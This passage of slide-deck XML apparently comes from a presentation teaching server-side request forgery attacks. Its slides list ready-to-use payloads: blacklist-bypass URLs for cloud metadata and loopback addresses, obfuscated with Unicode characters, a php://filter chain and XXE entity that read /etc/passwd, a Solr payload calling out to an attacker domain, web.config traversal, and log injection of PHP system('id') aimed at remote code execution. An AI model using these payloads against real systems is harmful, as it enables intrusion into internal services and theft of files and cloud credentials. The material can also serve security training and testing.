                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.88.23.245:22/+&amp;@google.com:80#+@google.com:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://google.com:80+&amp;@google.com:80#+@127.88.23.245:22/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.88.23.245:22/?@google.com:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.88.23.245:22/#@www.google.com:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://google.com:80\\@127.88.23.245:22</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.1.1.1:80\@127.2.2.2:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.1.1.1:80\@@127.2.2.2:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.1.1.1:80:\@@127.2.2.2:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.1.1.1:80#\@127.2.2.2:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169。254。169。254/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169｡254｡169｡254/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⑯⑨。②⑤④。⑯⑨｡②⑤④/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ｡⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://②⑧⑤②⓪③⑨①⑥⑥:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://④②⑤｡⑤①⓪｡④②⑤｡⑤①⓪:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪⓪②⑤①｡⓪⓪⓪③⑦⑥｡⓪⓪⓪⓪②⑤①｡⓪⓪⓪⓪⓪③⑦⑥:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::①⑥⑨｡②⑤④｡⑯⑨｡②⑤④]:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪ⓧⓐ⑨｡⑯⑥⑧⑨⑥⑥②:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪⓪②⑤①｡⓪ⓧⓕⓔ｡④③⑤①⑧:80/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="743" name="Google Shape;743;p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0213" y="2906100"/>
            <a:ext cx="503200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4" name="Google Shape;744;p8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1325" y="33326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745" name="Google Shape;745;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258050" y="24585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746" name="Google Shape;746;p8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0225" y="2484650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81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http://www.company.com# @me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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752" name="Google Shape;752;p81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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.company.com# @me.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="753" name="Google Shape;753;p81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54" name="Google Shape;754;p81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81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756" name="Google Shape;756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7" name="Google Shape;757;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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758" name="Google Shape;758;p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475" y="2675525"/>
            <a:ext cx="462101" cy="365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82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Protocol Wrappers Other Than Http OR HTTPS e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSH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SFTP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POP3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IMAP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SMTP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FTP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DICT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GOPHER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TFTP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sftp://me</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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764" name="Google Shape;764;p82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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sftp://me.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="765" name="Google Shape;765;p82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66" name="Google Shape;766;p82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82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768" name="Google Shape;768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9" name="Google Shape;769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025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770" name="Google Shape;770;p82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83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76" name="Google Shape;776;p83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83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Try To Use This Payload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778" name="Google Shape;778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9" name="Google Shape;779;p83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php://filter/convert.iconv.WINDOWS-936%2FCP1388|convert.base64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4899%2F%2FTRANSLIT|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4899%2F%2FTRANSLIT|convert.quoted-printable-encode|convert.iconv.WINDOWS-936%2FCP1388/resource=/etc/passwd%20#@%20read/resource=file:///etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="780" name="Google Shape;780;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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781" name="Google Shape;781;p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475" y="2675525"/>
            <a:ext cx="462101" cy="365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84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87" name="Google Shape;787;p84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84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Try To Use This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload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789" name="Google Shape;789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p84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php://filter/convert.iconv.WINDOWS-936%2FCP1388|convert.base64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4899%2F%2FTRANSLIT|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4899%2F%2FTRANSLIT|convert.quoted-printable-encode|convert.iconv.WINDOWS-936%2FCP1388/resource=/etc/passwd%20#@%20read/resource=file:///etc/passwd%20#[]@%20127.0.0.1:1337/index.php?url=file:///etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="791" name="Google Shape;791;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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792" name="Google Shape;792;p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475" y="2675525"/>
            <a:ext cx="462101" cy="365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85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You Got Blind SSRF Over HTTP OR HTTPS , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Request The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unresolvable</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Subdomains</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Because There Are </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reachable Subdomains Over Only VPN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798" name="Google Shape;798;p85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99" name="Google Shape;799;p85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85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801" name="Google Shape;801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2" name="Google Shape;802;p85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803" name="Google Shape;803;p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4" name="Google Shape;804;p8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36000" y="2675525"/>
            <a:ext cx="4973700" cy="20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86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You Got Blind SSRF Over HTTP OR HTTPS , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Request An Internal URL That</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Performs Another SSRF That Calls Out To Your Domain e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache Solr Is Running </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internally</a:t>
            </a:r>
            <a:endParaRPr b="1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t/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810" name="Google Shape;810;p86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11" name="Google Shape;811;p86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86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813" name="Google Shape;813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4" name="Google Shape;814;p86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815" name="Google Shape;815;p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7300" y="2675525"/>
            <a:ext cx="492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816" name="Google Shape;816;p86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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://apache-solr.company.com/solr/gettingstarted/select?q={!xmlparser v='&lt;!DOCTYPE a SYSTEM "http://me.com/"'&gt;&lt;a&gt;&lt;/a&gt;'</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="120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87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There Is ASP.NET </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.+./.+./web.config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http:// 127.0.0.1:[0-65535]/[Home|Admin|Administrator]/Index?</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Admin Page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822" name="Google Shape;822;p87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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http:// 127.0.0.1:PORT/Home/Index?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="823" name="Google Shape;823;p87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24" name="Google Shape;824;p87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87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826" name="Google Shape;826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7" name="Google Shape;827;p87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828" name="Google Shape;828;p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3067788"/>
            <a:ext cx="4210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829" name="Google Shape;829;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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830" name="Google Shape;830;p8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3475" y="2675525"/>
            <a:ext cx="462101" cy="365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88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36" name="Google Shape;836;p88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88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Reading From Remote XML File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838" name="Google Shape;838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9" name="Google Shape;839;p88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://me.com/file.xml</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="840" name="Google Shape;840;p88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3205300" y="1581400"/>
            <a:ext cx="4835100" cy="6705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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat file.xml</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?xml version="1.0"?&gt; </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!DOCTYPE root [</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!ENTITY read SYSTEM "file:///etc/passwd"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;root&gt;&lt;email&gt;&amp;read;&lt;/email&gt;&lt;/root&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="841" name="Google Shape;841;p88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842" name="Google Shape;842;p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250" y="2675525"/>
            <a:ext cx="49055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843" name="Google Shape;843;p88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844" name="Google Shape;844;p8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925" y="3110050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845" name="Google Shape;845;p88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846" name="Google Shape;846;p8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4025" y="3537325"/>
            <a:ext cx="421000" cy="3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Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ../../</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../../proc/self/fd/Number-FUZZ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With Referer Header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&lt;?php system('id');?&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get RCE 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254" name="Google Shape;254;p44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/Interaction-File-URL HTTP/1.1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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?php system('id');?&gt;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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../../../../proc/self/fd/Number-FUZZ</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="Google Shape;255;p44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56" name="Google Shape;256;p44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44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58" name="Google Shape;25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4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60" name="Google Shape;260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350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89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52" name="Google Shape;852;p89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89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Reading From Remote mp4 File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854" name="Google Shape;854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5" name="Google Shape;855;p89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://me.com/file.mp4</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="856" name="Google Shape;856;p89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3205300" y="1581400"/>
            <a:ext cx="4835100" cy="6705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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat file.mp4</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#EXTM3U</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#EXT-X-MEDIA-SEQUENCE:0</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#EXTINF:10.0,</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://me.com/2.mp4</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#EXT-X-ENDLIST</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
